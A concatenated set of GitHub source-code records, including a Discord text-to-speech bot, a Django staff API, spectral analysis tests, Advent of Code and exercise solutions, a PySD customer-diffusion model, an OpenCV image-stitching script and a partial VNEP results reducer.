ibm_cloud_sdk_core.authenticators import IAMAuthenticator\n\n path = f\"temp.mp3\"\n voice = \"pt-BR_IsabelaV3Voice\"\n url = \"https://api.us-south.text-to-speech.watson.cloud.ibm.com/\"\n\n tts = TextToSpeechV1(authenticator=IAMAuthenticator(ibmkey))\n tts.set_service_url(url)\n r = tts.synthesize(output, accept=\"audio/mp3\", voice=voice).get_result()\n else:\n\n lang = \"pt-pt\" if voz == \"Leonor\" else \"pt-br\"\n url = f\"http://api.voicerss.org/?key={voicerssKey}&hl={lang}&v={voz}&c=MP3&src={output}&f=12khz_16bit_stereo\" \n r = requests.get(url, stream=True)\n \n path = Helper.get_epoch_filename(\"mp3\")\n\n if r.status_code == 200:\n with open(path, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024*1024):\n if chunk:\n f.write(chunk)\n else:\n return None\n return 
path\n\nclass Voice(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.vozSelected = \"Isabela\"\n\n @commands.command(name=\"voz\", aliases=[\"voice\"], description='Comando para selecionar a voz ou listar as vozes disponíveis.')\n async def voiceList(self, ctx: commands.Context, cmd=None, voz=None):\n if cmd == \"list\":\n await ctx.send(voicesString.replace(self.vozSelected, f\"{self.vozSelected} - Selecionado\"))\n elif cmd == \"set\":\n if voz:\n voz = voz.replace(voz[0], voz[0].upper())\n if voz in voicesString:\n self.vozSelected = voz\n await ctx.send(\"Voz alterada com sucesso para: \" + self.vozSelected)\n else:\n await ctx.send(\"Erro, verifique se inseriu a voz certa (!vozes set [voz desejada]), \"\n +\"use !voz list para listar as vozes disponíveis.\")\n else:\n await ctx.send(\"Que? Usa-se assim: !voz [list ou set]. O comando para falar é \\\"!falar [frase (entre aspas)]\\\"\")\n \n\n @commands.command(name='falar', aliases=[\"say\", \"dizer\"],description='Toca audio text-to-speech')\n async def voice(self, ctx: commands.Context, *content):\n try:\n\n if content[0] == \"-a\":\n anon = True\n content = tuple(x for x in content if x != \"-a\")\n else:\n anon = False\n\n channel = ctx.message.author.voice.channel\n path = getVoice(\" \".join(content), voz=self.vozSelected)\n\n if path:\n if anon:\n await ctx.message.delete()\n\n vc = await channel.connect()\n player = vc.play(discord.FFmpegPCMAudio(path), after=lambda e: print('done', e))\n\n while vc.is_playing():\n await asyncio.sleep(1)\n\n vc.stop()\n await vc.disconnect()\n os.remove(path)\n else:\n await ctx.send(\"Um erro aconteceu ao processar o áudio, verifique os logs.\")\n\n except AttributeError as e:\n await ctx.send(\"Você não está em um canal de voz.\", e)\n\ndef setup(bot):\n bot.add_cog(Voice(bot))\n\nif __name__ == \"__main__\":\n print(getVoice(\"Isto aqui e um teste.\"))","repo_name":"vinists/Botinho","sub_path":"Botinho/cogs/voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27341144984","text":"from django.http import JsonResponse\r\nfrom rest_framework.views import APIView\r\n\r\nfrom staff.models import Staff\r\nfrom staff.serializer import StaffSerializer\r\n\r\nfrom rest_framework.permissions import IsAuthenticated\r\n\r\nclass StaffList(APIView):\r\n\r\n permission_classes = [IsAuthenticated]\r\n \r\n def get(self, request):\r\n \r\n staffObj = Staff.objects\r\n \r\n staffSerializer = StaffSerializer(staffObj, many=True)\r\n \r\n return JsonResponse({\r\n \"error\": False,\r\n \"data\": staffSerializer.data,\r\n \"message\": \"Get data successfully\"\r\n })\r\n\r\n def post(self, request):\r\n \r\n body = request.data \r\n \r\n staffSerializer = StaffSerializer(data={\r\n \"name\": body['name'],\r\n \"nip\": body['nip'],\r\n \"phone\": body['phone'],\r\n \"email\": body['email'],\r\n \"role\": body['role'],\r\n \"address\": body['address']\r\n\r\n })\r\n \r\n if staffSerializer.is_valid():\r\n\r\n staffSerializer.save()\r\n \r\n return JsonResponse({\r\n \"error\": False,\r\n \"data\": staffSerializer.data,\r\n \"message\": \"Data saved successfully\"\r\n })\r\n \r\n else:\r\n \r\n return JsonResponse({\r\n \"error\": True,\r\n \"data\": None,\r\n \"message\": staffSerializer.errors\r\n })\r\n\r\nclass StaffDetail(APIView):\r\n \r\n def get(self, request, id):\r\n \r\n staffObj = Staff.objects.filter(id=id).first()\r\n \r\n staffSerializer = 
StaffSerializer(staffObj)\r\n \r\n return JsonResponse({\r\n \"error\": False,\r\n \"data\": staffSerializer.data\r\n })\r\n \r\n def put(self, request, id):\r\n \r\n body = request.data \r\n \r\n staffObj = Staff.objects.filter(id=id).first()\r\n \r\n staffSerializer = StaffSerializer(staffObj, data={\r\n \"name\": body['name'],\r\n \"nip\": body['nip'],\r\n \"phone\": body['phone'],\r\n \"email\": body['email'],\r\n \"role\": body['role'],\r\n \"address\": body['address']\r\n })\r\n \r\n if staffSerializer.is_valid():\r\n staffSerializer.save()\r\n \r\n return JsonResponse({\r\n \"error\": False,\r\n \"data\": staffSerializer.data,\r\n \"message\": \"Data updated successfully\"\r\n })\r\n \r\n else :\r\n return JsonResponse({\r\n \"data\": None,\r\n \"error\": True,\r\n \"message\": staffSerializer.errors\r\n })\r\n \r\n def delete(self, request, id):\r\n \r\n staffObject = Staff.objects.filter(id=id)\r\n \r\n staffObject.delete()\r\n \r\n return JsonResponse({\r\n \"error\": False,\r\n \"data\": None,\r\n \"message\": \"Data deleted successfully\"\r\n })","repo_name":"indrascl/projectInventory","sub_path":"inventoryproject/staff/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"17586545851","text":"from matplotlib.mlab import psd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport spectrum as sp\nimport filters\nimport preprocessing as pp\n\n\ndef verif_psd(sig_type):\n file_ids = ['0001', '0193']\n time_windows = [(960, 1260), (299, 599)]\n all_p = []\n all_f = []\n for file_id in file_ids:\n raw_t, raw_hr, t, hr = pp.one_patient_sig(file_id, sig_type)\n for time_window in time_windows:\n print(str(t[time_window[0]]) + '-' + str(t[time_window[1]]))\n p, f = psd(raw_hr[time_window[0]:time_window[1]], NFFT=300, detrend='mean')\n all_p.append(p)\n all_f.append(f)\n plt.figure()\n plt.plot(f, p)\n plt.title(file_id + ' : ' + str(time_window[0]) + '-' + str(time_window[1]))\n return all_f, all_p\n\n\nraw_t, raw_hr, t, hr = pp.patient_sig('0012')\n#t, hr = t[8720:9140], hr[8720:9140]\n\n#ibi = 1/hr\n\n#sig = sp.data_cosine(N=1024, A=0.1, sampling=1024, freq=200) + sp.data_cosine(N=1024, A=0.1, sampling=1024, freq=150)\n\n\n#pxx1, f1 = psd(raw_hr, NFFT=4096)\n#pxx2, f2 = psd(raw_hr, NFFT=4096, detrend='mean')\n\n#w = sp.Window(120, 'hann')\np = sp.WelchPeriodogram(raw_hr[0:300], NFFT=300)\n#p.run()\n\n#p.plot()\n#plt.plot(p[0][1], 10*np.log10(p[0][0]))\n#plt.plot(f1, 10*np.log10(pxx1), label='no detrend')\n#plt.plot(f2, 10*np.log10(pxx2), label='mean detrend')\n\n#plt.legend()\n\n","repo_name":"dperez96/projet_gabi","sub_path":"tests_psd.py","file_name":"tests_psd.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3143626497","text":"from time import perf_counter\n\n\ndirs = {\"L\": (-1, 0), \"R\": (1, 0), \"U\": (0, 1), \"D\": (0, -1)}\n\n\ndef manhatDist(p1, p2):\n return sum(abs(c1 - c2) for c1, c2 in zip(p1, p2))\n\n\ndef moveTail(head, tail):\n if (any(h == t for h, t in zip(head, tail)) and max(abs(h - t) for h, t in zip(head, tail)) == 2) or manhatDist(head, tail) >= 3:\n diff = [((h - t) // abs(h - t)) if h - t != 0 else 0 for h, t in zip(head, tail)]\n return [c1 + c2 for c1, c2 in zip(tail, diff)]\n else:\n return tail\n\n\ndef main(verbose):\n with open(\"input.txt\", encoding=\"UTF-8\") as f:\n lines = [line.strip('\\n') for line in 
f.readlines()]\n\n head = [0, 0]\n tail = [0, 0]\n tailVisits = set()\n\n for line in lines:\n d, amt = line.split(' ')\n d = dirs[d]\n amt = int(amt)\n\n while amt > 0:\n head = [p + o for p, o in zip(head, d)]\n\n tailVisits.add(tuple(tail))\n tail = moveTail(head, tail)\n\n amt -= 1\n\n tailVisits.add(tuple(tail))\n part1 = len(tailVisits)\n\n tails = [[0, 0] for _ in range(10)]\n tailVisits = set()\n\n for line in lines:\n d, amt = line.split(' ')\n d = dirs[d]\n amt = int(amt)\n\n while amt > 0:\n tails[0] = [t + o for t, o in zip(tails[0], d)]\n\n tailVisits.add(tuple(tails[-1]))\n for i in range(1, 10):\n tails[i] = moveTail(tails[i - 1], tails[i])\n\n amt -= 1\n\n tailVisits.add(tuple(tail))\n\n if verbose:\n print(f\"\\nPart 1:\\nNumber of positions visited by tail of rope: {part1}\\n\\nPart 2:\\nNumber of positions visited by tail of rope: {len(tailVisits)}\")\n\n return [part1, len(tailVisits)]\n\n\nif __name__ == \"__main__\":\n init_time = perf_counter()\n main(True)\n print(f\"\\nRan in {perf_counter() - init_time} seconds.\")","repo_name":"brandonhippe/Advent-of-Code","sub_path":"2022/9/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70238359814","text":"'''\nA palindromic number reads the same both ways.\nThe smallest 6 digit palindrome made from the product\nof two 3-digit numbers is\n\n101101 = 143 * 707\n\nFind the largest palindrome made from the product of\ntwo 3-digit numbers which is less than `N`\n'''\n\nn = 100000\ni = 100\npairs = []\n\nwhile i <= (n // i):\n if n % i == 0:\n pairs.append((i, n // i))\n i += 1\n\n\nm = (0, 0)\nfor p in pairs:\n if abs(p[0] - p[1]) > abs(m[0] - m[1]):\n m = p\nprint(m)\n","repo_name":"kaizer1v/py-exercises","sub_path":"4_largest_palindrome.py","file_name":"4_largest_palindrome.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"28100488860","text":"\"\"\"\nPython model 'bass.py'\nTranslated using PySD\n\"\"\"\n\nfrom pathlib import Path\n\nfrom pysd.py_backend.statefuls import Integ\n\n__pysd_version__ = \"2.2.1\"\n\n__data = {\"scope\": None, \"time\": lambda: 0}\n\n_root = Path(__file__).parent\n\n_subscript_dict = {}\n\n_namespace = {\n \"TIME\": \"time\",\n \"FINAL TIME\": \"final_time\",\n \"INITIAL TIME\": \"initial_time\",\n \"SAVEPER\": \"saveper\",\n \"TIME STEP\": \"time_step\",\n \"Time\": \"time\",\n\n \"Our Customers\": \"our_customers\",\n \"Potential Customers\": \"potential_customers\",\n \"Competitor Customers\": \"competitor_customers\",\n\n \"New Customers\": \"our_gain\",\n \"New Potential Customers\": \"potential_gain\",\n \"New Competitor Customers\": \"competitor_gain\",\n\n \"Potential Customers -> Our Customers\": \"potential2our\",\n \"Potential Customers -> Competitor Customers\": \"potential2competitor\",\n \"Our Customers -> Potential Customers\": \"our2potential\",\n \"Competitor Customers -> Potential Customers\": \"competitor2potential\",\n \"Our Customers -> Competitor Customers\": \"our2competitor\",\n \"Competitor Customers -> Our Customers\": \"competitor2our\",\n \"Demand from Marketing\": \"marketing_demand\",\n \"Concentration of Potential Customers\": \"potential_customers_concentration\",\n \"Total population (actual)\": \"total_market\",\n\n \"P11\": \"p11\",\n \"P13\": \"p13\",\n \"P21\": \"p21\",\n \"P23\": \"p23\",\n \"Word of Mouth impact\": 
\"efficiency_word_of_mouth\",\n \"Marketing impact\": \"efficiency_marketing\",\n \"Rate\": \"sociability\",\n \"Share of Dissatisfied\": \"k\",\n \"Luring Threshold\": \"tr\"\n}\n\n_dependencies = {\n \"final_time\": {},\n \"initial_time\": {},\n \"saveper\": {\"time_step\": 1},\n \"time_step\": {},\n\n \"our_customers\": {\"_integ_our_customers\": 1},\n \"potential_customers\": {\"_integ_potential_customers\": 1},\n \"competitor_customers\": {\"_integ_competitor_customers\": 1},\n\n \"_integ_our_customers\": {\"initial\": {}, \"step\": {\"our_gain\": 1}},\n \"_integ_potential_customers\": {\"initial\": {}, \"step\": {\"potential_gain\": 1}},\n \"_integ_competitor_customers\": {\"initial\": {}, \"step\": {\"competitor_gain\": 1}},\n\n \"our_gain\": {\n \"potential2our\": 1,\n \"competitor2our\": 1,\n \"our2potential\": 1,\n \"our2competitor\": 1\n },\n \"potential_gain\": {\n \"our2potential\": 1,\n \"competitor2potential\": 1,\n \"potential2our\": 1,\n \"potential2competitor\": 1\n },\n \"competitor_gain\": {\n \"potential2competitor\": 1,\n \"our2competitor\": 1,\n \"competitor2potential\": 1,\n \"competitor2our\": 1\n },\n\n \"potential2our\": {\n \"our_customers\": 1,\n \"p11\": 1,\n \"sociability\": 1,\n \"potential_customers_concentration\": 1,\n \"efficiency_word_of_mouth\": 1,\n \"marketing_demand\": 1\n },\n \"potential2competitor\": {\n \"competitor_customers\": 1,\n \"p21\": 1,\n \"sociability\": 1,\n \"potential_customers_concentration\": 1,\n \"efficiency_word_of_mouth\": 1,\n \"marketing_demand\": 1\n\n },\n \"our2potential\": {\n \"our_customers\": 1,\n \"p13\": 1,\n \"k\": 1\n },\n \"competitor2potential\": {\n \"competitor_customers\": 1,\n \"p23\": 1,\n \"k\": 1\n },\n \"our2competitor\": {\n \"tr\": 1,\n \"efficiency_word_of_mouth\": 1,\n \"sociability\": 1,\n \"competitor_customers\": 1,\n \"p21\": 1,\n \"our_customers\": 1,\n \"p11\": 1,\n \"k\": 1,\n \"p13\": 1,\n \"total_market\": 1\n },\n \"competitor2our\": {\n \"tr\": 1,\n \"efficiency_word_of_mouth\": 1,\n \"sociability\": 1,\n \"our_customers\": 1,\n \"p11\": 1,\n \"competitor_customers\": 1,\n \"p21\": 1,\n \"k\": 1,\n \"p23\": 1,\n \"total_market\": 1\n },\n \"marketing_demand\": {\n \"efficiency_marketing\": 1,\n \"potential_customers\": 1\n },\n \"potential_customers_concentration\": {\n \"potential_customers\": 1,\n \"total_market\": 1\n },\n \"total_market\": {\n \"our_customers\": 1,\n \"potential_customers\": 1,\n \"competitor_customers\": 1\n },\n\n \"p11\": {},\n \"p13\": {},\n \"p21\": {},\n \"p23\": {},\n \"efficiency_word_of_mouth\": {},\n \"efficiency_marketing\": {},\n \"sociability\": {},\n \"k\": {\n \"efficiency_marketing\": 1,\n \"efficiency_word_of_mouth\": 1\n },\n \"tr\": {\n \"efficiency_word_of_mouth\": 1,\n \"efficiency_marketing\": 1\n },\n}\n\n##########################################################################\n# CONTROL VARIABLES #\n##########################################################################\n\n_control_vars = {\n \"initial_time\": lambda: 0,\n \"final_time\": lambda: final_time(),\n \"time_step\": lambda: 1,\n \"saveper\": lambda: time_step(),\n}\n\n\ndef _init_outer_references(data):\n for key in data:\n __data[key] = data[key]\n\n\ndef time():\n return __data[\"time\"]()\n\n\ndef final_time():\n \"\"\"\n Real Name: FINAL TIME\n Original Eqn: 100\n Units: Month\n Limits: (None, None)\n Type: constant\n Subs: None\n\n The final time for the simulation.\n \"\"\"\n return __data[\"time\"].final_time()\n\n\ndef initial_time():\n \"\"\"\n Real Name: INITIAL TIME\n 
Original Eqn: 0\n Units: Month\n Limits: (None, None)\n Type: constant\n Subs: None\n\n The initial time for the simulation.\n \"\"\"\n return __data[\"time\"].initial_time()\n\n\ndef saveper():\n \"\"\"\n Real Name: SAVEPER\n Original Eqn: TIME STEP\n Units: Month\n Limits: (None, None)\n Type: component\n Subs: None\n\n The frequency with which output is stored.\n \"\"\"\n return __data[\"time\"].saveper()\n\n\ndef time_step():\n \"\"\"\n Real Name: TIME STEP\n Original Eqn: 1\n Units: Month\n Limits: (None, None)\n Type: constant\n Subs: None\n\n The time step for the simulation.\n \"\"\"\n return __data[\"time\"].time_step()\n\n\n##########################################################################\n# MODEL VARIABLES #\n##########################################################################\n\ndef our_customers():\n \"\"\"\n Real Name: Our Customers\n Original Eqn: INTEG(-our gain, 0)\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return _integ_our_customers()\n\n\ndef potential_customers():\n \"\"\"\n Real Name: Potential Customers\n Original Eqn: INTEG(-potential gain, 10e05)\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return _integ_potential_customers()\n\n\ndef competitor_customers():\n \"\"\"\n Real Name: Competitor Customers\n Original Eqn: INTEG(-competitor gain, 0)\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return _integ_competitor_customers()\n\n\n_integ_our_customers = Integ(lambda: our_gain(), lambda: 0, \"_integ_customers\")\n\n\n_integ_potential_customers = Integ(lambda: potential_gain(), lambda: 1e05, \"_integ_potential_customers\")\n\n\n_integ_competitor_customers = Integ(lambda: competitor_gain(), lambda: 0, \"_integ_customers\")\n\n\ndef our_gain():\n \"\"\"\n Real Name: New Customers\n Original Eqn: potential2our + competitor2our + our2potential + our2competitor \n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return potential2our() + competitor2our() - our2potential() - our2competitor() \n\n\ndef potential_gain():\n \"\"\"\n Real Name: New Potential Customers\n Original Eqn: our2potential + competitor2potential + potential2our + potential2competitor \n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return our2potential() + competitor2potential() - potential2our() - potential2competitor()\n\n\ndef competitor_gain():\n \"\"\"\n Real Name: New Competitor Customers\n Original Eqn: potential2competitor + our2competitor + competitor2potential + competitor2our \n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return potential2competitor() + our2competitor() - competitor2potential() - competitor2our()\n\n\ndef potential2our():\n \"\"\"\n Real Name: Potential Customers -> Our Customers\n Original Eqn: marketing_demand + (efficiency_wom * rate * potential_customers * our_customers * p11) / total_market\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n satisfied_customers = our_customers() * p11()\n contacts_with_customers = satisfied_customers * sociability()\n contacts_of_noncustomers_with_customers = contacts_with_customers * potential_customers_concentration()\n word_of_mouth_demand = efficiency_word_of_mouth() * contacts_of_noncustomers_with_customers\n return marketing_demand() + word_of_mouth_demand\n\n\ndef potential2competitor():\n \"\"\"\n Real Name: Potential Customers -> Competitor Customers\n 
Original Eqn: marketing_demand + (efficiency_wom * rate * potential_customers * competitor_customers * p21) / total_market\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n satisfied_customers = competitor_customers() * p21()\n contacts_with_customers = satisfied_customers * sociability()\n contacts_of_noncustomers_with_customers = contacts_with_customers * potential_customers_concentration()\n word_of_mouth_demand = efficiency_word_of_mouth() * contacts_of_noncustomers_with_customers\n return marketing_demand() + word_of_mouth_demand\n\n\ndef our2potential():\n \"\"\"\n Real Name: Our Customers -> Potential Customers\n Original Eqn: our_customers * p13 * share_dissatisfied\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return our_customers() * p13() * k()\n\n\ndef competitor2potential():\n \"\"\"\n Real Name: Competitor Customers -> Potential Customers\n Original Eqn: competitor_customers * p23 * share_dissatisfied\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return competitor_customers() * p23() * k()\n\n\ndef our2competitor():\n \"\"\"\n Real Name: Our Customers -> Competitor Customers\n Original Eqn: luring_threshold * efficiency_word_of_mouth * rate * competitor_customers * p21 * our_customers * (1 - p11 - share_dissatisfied * p13) / total_market\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return tr() * efficiency_word_of_mouth() * sociability() * competitor_customers() * p21() * our_customers() * (1 - p11() - k() * p13()) / total_market()\n\n\ndef competitor2our():\n \"\"\"\n Real Name: Competitor Customers -> Our Customers\n Original Eqn: luring_threshold * efficiency_word_of_mouth * rate * competitor_customers * p11 * our_customers * (1 - p21 - share_dissatisfied * p23) / total_market\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return tr() * efficiency_word_of_mouth() * sociability() * our_customers() * p11() * competitor_customers() * (1 - p21() - k() * p23()) / total_market()\n\n\ndef marketing_demand():\n \"\"\"\n Real Name: Demand from Marketing\n Original Eqn: Efficiency Marketing / Potential Customers\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return efficiency_marketing() * potential_customers()\n\n\ndef potential_customers_concentration():\n \"\"\"\n Real Name: Concentration of Potential Customers\n Original Eqn: Potential Customers / Total Market\n Units: float\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return potential_customers() / total_market()\n\n\ndef total_market():\n \"\"\"\n Real Name: Total population (actual)\n Original Eqn: Our Customers + Potential Customers + Competitor Customers\n Units: person\n Limits: (None, None)\n Type: component\n Subs: None\n\n\n \"\"\"\n return our_customers() + potential_customers() + competitor_customers()\n\n\ndef p11():\n \"\"\"\n Real Name: P11\n Original Eqn: 0.5\n Units: float\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 0.5\n\n\ndef p13():\n \"\"\"\n Real Name: P13\n Original Eqn: 0.5\n Units: float\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 0.5\n\n\ndef p21():\n \"\"\"\n Real Name: P21\n Original Eqn: 0.5\n Units: float\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 0.5\n\n\ndef p23():\n \"\"\"\n Real Name: P23\n Original Eqn: 0.5\n Units: float\n Limits: (None, None)\n Type: 
constant\n Subs: None\n\n\n \"\"\"\n return 0.5\n\n\ndef efficiency_word_of_mouth():\n \"\"\"\n Real Name: Word of Mouth impact\n Original Eqn: 0.011\n Units: person / contact\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 0.015\n\n\ndef efficiency_marketing():\n \"\"\"\n Real Name: Marketing impact\n Original Eqn: 0.015\n Units: person / contact\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 0.011\n\n\ndef final_time():\n \"\"\"\n Real Name: FINAL TIME\n Original Eqn: 100\n Units: int\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 100\n\n\ndef sociability():\n \"\"\"\n Real Name: Rate\n Original Eqn: 100\n Units: contact / person / Month\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return 100\n\n\ndef k():\n \"\"\"\n Real Name: Share of Dissatisfied\n Original Eqn: Market_impact / (WoM_impact + Market_impact)\n Units: float\n Limits: (None, None)\n Type: constant\n Subs: None\n\n\n \"\"\"\n return efficiency_marketing() / (efficiency_marketing() + efficiency_word_of_mouth())\n\n\ndef tr():\n \"\"\"\n Real Name: Share of Dissatisfied\n Original Eqn: WoM_impact / (WoM_impact + Market_impact)\n Units: float\n Limits: (None, None)\n Type: constant\n Subs: None\n \"\"\"\n return efficiency_word_of_mouth() / (efficiency_marketing() + efficiency_word_of_mouth())\n","repo_name":"DanisAlukaev/Simulation-Modelling","sub_path":"Assignment 2/bass.py","file_name":"bass.py","file_ext":"py","file_size_in_byte":13959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6794709696","text":"import numpy as np\nimport cv2\nMIN_MATCH_COUNT = 10\n\nimg1 = cv2.imread('im1.jpg',0) # queryImage\nimg2 = cv2.imread('im2.jpg',0) # trainImage\n\n# Initiate SIFT detector\nsift = cv2.SIFT()\n\n# find the keypoints and descriptors with SIFT\nkp1, des1 = sift.detectAndCompute(img1,None)\nkp2, des2 = sift.detectAndCompute(img2,None)\n\nFLANN_INDEX_KDTREE = 0\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks = 50)\n\nflann = cv2.FlannBasedMatcher(index_params, search_params)\n\nmatches = flann.knnMatch(des2,des1,k=2)\n\nh1, w1 = img1.shape[:2]\nh2, w2 = img2.shape[:2]\n# store all the good matches as per Lowe's ratio test.\ngood = []\nfor m,n in matches:\n if m.distance < 1*n.distance:\n good.append(m)\n\nif len(good)>MIN_MATCH_COUNT:\n src_pts = np.float32([ kp2[m.queryIdx].pt for m in good ]).reshape(-1,1,2)\n dst_pts = np.float32([ kp1[m.trainIdx].pt for m in good ]).reshape(-1,1,2)\n\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)\n matchesMask = mask.ravel().tolist()\n\nelse:\n print (\"Not enough matches are found - %d/%d\" %(len(good), MIN_MATCH_COUNT))\n matchesMask = None\n\n\n\n\nif matchesMask:\n # Initialize a matrix to include all the coordinates in the image, from (0, 0), (1, 0), ..., to (w-1, h-1)\n # In this way, you do not need loops to access every pixel\n c = np.zeros((3, h2*w2), dtype=np.int)\n for y in range(h2):\n c[:, y*w2:(y+1)*w2] = np.matrix([np.arange(w2), [y] * w2, [1] * w2])\n\n # Calculate the new image coordinates. Note that the third row needs to be normalized to 1\n # M is the homography matrix\n new_c = M * np.matrix(c)\n new_c = np.around(np.divide(new_c, new_c[2]))\n\n # The new coordinates may have negative values. 
Perform translation if needed\n x_min = np.amin(new_c[0])\n y_min = np.amin(new_c[1])\n x_max = np.amax(new_c[0])\n y_max = np.amax(new_c[1])\n if x_min < 0:\n t_x = -x_min\n else:\n t_x = 0\n if y_min < 0:\n t_y = -y_min\n else:\n t_y = 0\n\n # Initialize the final images to include every pixel of the stitched images \n new_w = np.maximum(x_max, w1) - np.minimum(x_min, 0) + 1\n new_h = np.maximum(y_max, h1) - np.minimum(y_min, 0) + 1\n new_img1 = np.zeros((new_h, new_w), dtype=np.uint8)\n new_img2 = np.zeros((new_h, new_w), dtype=np.uint8)\n\n # Assign the first image\n new_img1[t_y:t_y+h1, t_x:t_x+w1] = img1\n\n # Assign the second image based on the newly calculated coordinates\n for idx in range(c.shape[1]):\n x = c[0, idx]\n y = c[1, idx]\n x_c = new_c[0, idx]\n y_c = new_c[1, idx]\n new_img2[y_c + t_y, x_c + t_x] = img2[y, x]\n\n # The stitched image can be simply obtained by averaging the two final images\n new_img = (new_img1 + new_img2) / 2\n\n cv2.imshow(\"Stitched Image\", new_img)\n cv2.waitKey()\n cv2.destroyAllWindows()\n","repo_name":"michaelyeg/cmput206lab2016-sample","sub_path":"lab06/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3762200158","text":"import os\nfrom collections import namedtuple\nimport numpy as np\nfrom alib import solutions, util\n\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\nfrom vnep_approx import vine, treewidth_model\n\nREQUIRED_FOR_PICKLE = solutions # this prevents pycharm from removing this import, which is required for unpickling solutions\n\nReducedOfflineViNEResultCollection = namedtuple(\n \"ReducedOfflineViNEResultCollection\",\n [\n \"total_runtime\", # AggregatedData\n \"profit\", # AggregatedData\n \"runtime_per_request\", # AggregatedData\n \"num_initial_lp_failed\", # sum across repetitions\n \"num_node_mapping_failed\", # sum across repetitions\n \"num_edge_mapping_failed\", # sum across repetitions\n \"original_number_requests\",\n \"num_req_with_profit\",\n \"max_node_load\", # AggregatedData\n \"max_edge_load\", # AggregatedData\n ],\n)\n\nReducedRandRoundSepLPOptDynVMPCollectionResult = namedtuple(\n \"ReducedRandRoundSepLPOptDynVMPCollectionResult\",\n [\n \"lp_time_preprocess\",\n \"lp_time_tree_decomposition\",\n \"lp_time_dynvmp_initialization\",\n \"lp_time_dynvmp_computation\",\n \"lp_time_gurobi_optimization\",\n \"lp_time_optimization\",\n \"lp_status\",\n \"lp_profit\",\n \"lp_generated_columns\",\n \"max_node_loads\",\n \"max_edge_loads\",\n \"rounding_runtimes\",\n \"profits\"\n ],\n)\n\nAggregatedData = namedtuple(\n \"AggregatedData\",\n [\n \"min\",\n \"mean\",\n \"max\",\n \"std_dev\",\n \"value_count\"\n ]\n)\n\n\ndef get_aggregated_data(list_of_values):\n _min = np.min(list_of_values)\n _mean = np.mean(list_of_values)\n _max = np.max(list_of_values)\n _std_dev = np.std(list_of_values)\n _value_count = len(list_of_values)\n return AggregatedData(min=_min,\n max=_max,\n mean=_mean,\n std_dev=_std_dev,\n value_count=_value_count)\n\n\nlogger = util.get_logger(__name__, make_file=False, propagate=True)\n\n\nclass OfflineViNEResultCollectionReducer(object):\n\n def __init__(self):\n pass\n\n def reduce_vine_result_collection(self, baseline_solutions_input_pickle_name,\n reduced_baseline_solutions_output_pickle_name=None):\n\n baseline_solutions_input_pickle_path = os.path.join(\n util.ExperimentPathHandler.INPUT_DIR,\n baseline_solutions_input_pickle_name\n 
)\n\n if reduced_baseline_solutions_output_pickle_name is None:\n file_basename = os.path.basename(baseline_solutions_input_pickle_path).split(\".\")[0]\n reduced_baseline_solutions_output_pickle_path = os.path.join(util.ExperimentPathHandler.OUTPUT_DIR,\n file_basename + \"_reduced.pickle\")\n else:\n reduced_baseline_solutions_output_pickle_path = os.path.join(util.ExperimentPathHandler.OUTPUT_DIR,\n baseline_solutions_input_pickle_name)\n\n logger.info(\"\\nWill read from ..\\n\\t{} \\n\\t\\tand store reduced data into\\n\\t{}\\n\".format(baseline_solutions_input_pickle_path, reduced_baseline_solutions_output_pickle_path))\n\n logger.info(\"Reading pickle file at {}\".format(baseline_solutions_input_pickle_path))\n with open(baseline_solutions_input_pickle_path, \"rb\") as input_file:\n scenario_solution_storage = pickle.load(input_file)\n\n ssd = scenario_solution_storage.algorithm_scenario_solution_dictionary\n ssd_reduced = {}\n for algorithm in ssd.keys():\n 